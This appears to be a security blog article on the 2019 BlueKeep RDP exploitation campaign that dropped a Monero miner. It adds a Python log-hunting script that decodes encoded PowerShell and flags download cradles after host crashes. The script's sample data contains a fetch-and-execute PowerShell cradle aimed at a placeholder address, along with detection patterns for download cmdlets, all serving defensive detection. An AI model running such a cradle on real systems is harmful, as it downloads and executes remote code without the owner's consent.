Microsoft issued a security patch for Windows systems in May 2019 to close a serious vulnerability in the Remote Desktop Protocol (RDP) service (CVE-2019-0708, later nicknamed BlueKeep) that could allow an unauthenticated attacker to run code and take control of vulnerable Windows computers remotely. Despite dire warnings from Microsoft and U.S. Government officials to apply the patch as soon as possible, millions of Internet-connected Windows systems remained unpatched and exploitable, leading security researchers to predict that a malware worm would likely take advantage of them and mass-scan the Internet for more vulnerable systems, possibly causing network congestion and a worldwide slowing of data flow. On Saturday, November 2nd, security researchers running "honeypot" systems noticed that most of their honeypots exposing RDP (TCP port 3389) to the Internet had crashed, which appeared to be the result of exploitation attempts; a BlueKeep exploit that fails typically crashes the target's kernel rather than failing silently. Closer examination by Marcus Hutchins, a security researcher at Kryptos Logic, confirmed that an attacker had used pieces of the publicly available BlueKeep exploit module from the penetration-testing framework Metasploit in an attempt to run a series of PowerShell scripts that download and execute a malware program designed to mine Monero cryptocurrency. The Monero mining malware misuses the victim's computing resources and electricity to generate money for the attacker while slowing down the victim's computer, but it does not by itself allow the attacker to steal or destroy files. However, the same exploit could just as easily have been used to install any other type of malware, including Remote Access Trojans (RATs) or ransomware, which is why hosts that cannot be patched immediately should at least not expose port 3389 to the Internet and should require Network Level Authentication, which blocks the unauthenticated path the exploit relies on.
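The chain described above (an exploitation attempt that crashes the target, followed by a PowerShell download cradle that fetches the miner) is something a defender can hunt for in host logs. The following Python script is an added example, not code from the article or from Binary Defense. It runs over constructed sample log lines in an assumed "timestamp|host|source|message" layout with placeholder host names and a placeholder download URL (203.0.113.5 is a documentation address); real Sysmon and Windows event log records carry the same information in a different layout. It decodes PowerShell -EncodedCommand arguments (base64 of UTF-16LE text), looks for download cradles, and raises the severity when the same host logged a bugcheck shortly before, since a crash followed by PowerShell downloading from the Internet is exactly the pattern the honeypots showed.

```python
import base64
import re
from datetime import datetime, timedelta

# Constructed sample logs, not real telemetry. Assumed layout for this example:
# "timestamp|host|source|message", in chronological order.
def encode_powershell(command: str) -> str:
    """PowerShell's -EncodedCommand argument is base64 of the UTF-16LE command text."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")

# Placeholder cradle; the URL is a documentation address, not a real payload host.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"

SAMPLE_LOGS = [
    # Honeypot: one exploit attempt crashed the box, a later one ran PowerShell.
    "2019-11-02T03:14:07Z|honeypot-07|System|BugCheck: The computer has rebooted from a bugcheck.",
    "2019-11-02T03:35:22Z|honeypot-07|Sysmon|ProcessCreate Image=powershell.exe "
    "CommandLine=powershell -nop -w hidden -enc " + encode_powershell(_CRADLE),
    # Benign admin script: PowerShell, but no download cradle.
    "2019-11-02T04:00:00Z|fileserver-01|Sysmon|ProcessCreate Image=powershell.exe "
    "CommandLine=powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    # Crash with no follow-up activity: worth a look, but not the full chain.
    "2019-11-02T05:30:00Z|workstation-12|System|BugCheck: The computer has rebooted from a bugcheck.",
]

# PowerShell accepts abbreviated switch names, so match the common short forms too.
ENCODED_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"(?:DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|iwr|"
    r"Invoke-RestMethod|Start-BitsTransfer).*?(https?://[^\s'\")]+)",
    re.I,
)
# A crash this long before the PowerShell activity on the same host is treated as related.
CORRELATION_WINDOW = timedelta(hours=1)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or the line unchanged if there is none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # malformed base64 or odd byte count: fall back to the raw line


def find_download_url(cmdline: str):
    """URL fetched by a PowerShell download cradle, after decoding -enc if present."""
    m = DOWNLOAD_CRADLE.search(decode_encoded_command(cmdline))
    return m.group(1) if m else None


def parse(line: str):
    ts, host, source, msg = line.split("|", 3)
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host, source, msg


def hunt(lines):
    """Classify events and correlate a host crash with later PowerShell downloads."""
    crashes = {}  # host -> timestamps of bugcheck events seen so far
    findings = []
    for line in lines:
        ts, host, source, msg = parse(line)
        if source == "System" and "bugcheck" in msg.lower():
            crashes.setdefault(host, []).append(ts)
            findings.append({"host": host, "time": ts, "kind": "crash",
                             "severity": "low", "url": None})
        elif "powershell" in msg.lower():
            url = find_download_url(msg)
            if url is None:
                continue
            recent_crash = any(timedelta(0) <= ts - c <= CORRELATION_WINDOW
                               for c in crashes.get(host, []))
            findings.append({"host": host, "time": ts, "kind": "cradle",
                             "severity": "high" if recent_crash else "medium", "url": url})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOGS):
        print(f"{f['time']:%Y-%m-%d %H:%M} {f['host']:15} {f['kind']:6} {f['severity']:6} {f['url'] or ''}")
```

The decode step matters more than the regex: the encoded form of the cradle contains no readable "DownloadString", so a rule that only inspects the raw command line misses it. The correlation window and severities are arbitrary starting points; tune them to the environment, and treat any Internet-facing host that bugchecks repeatedly as suspect on its own, since the honeypots here crashed before any payload ran.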
By Akshay Rohatgi and Randy Pargman

About this Student Research Project

Binary Defense's mission is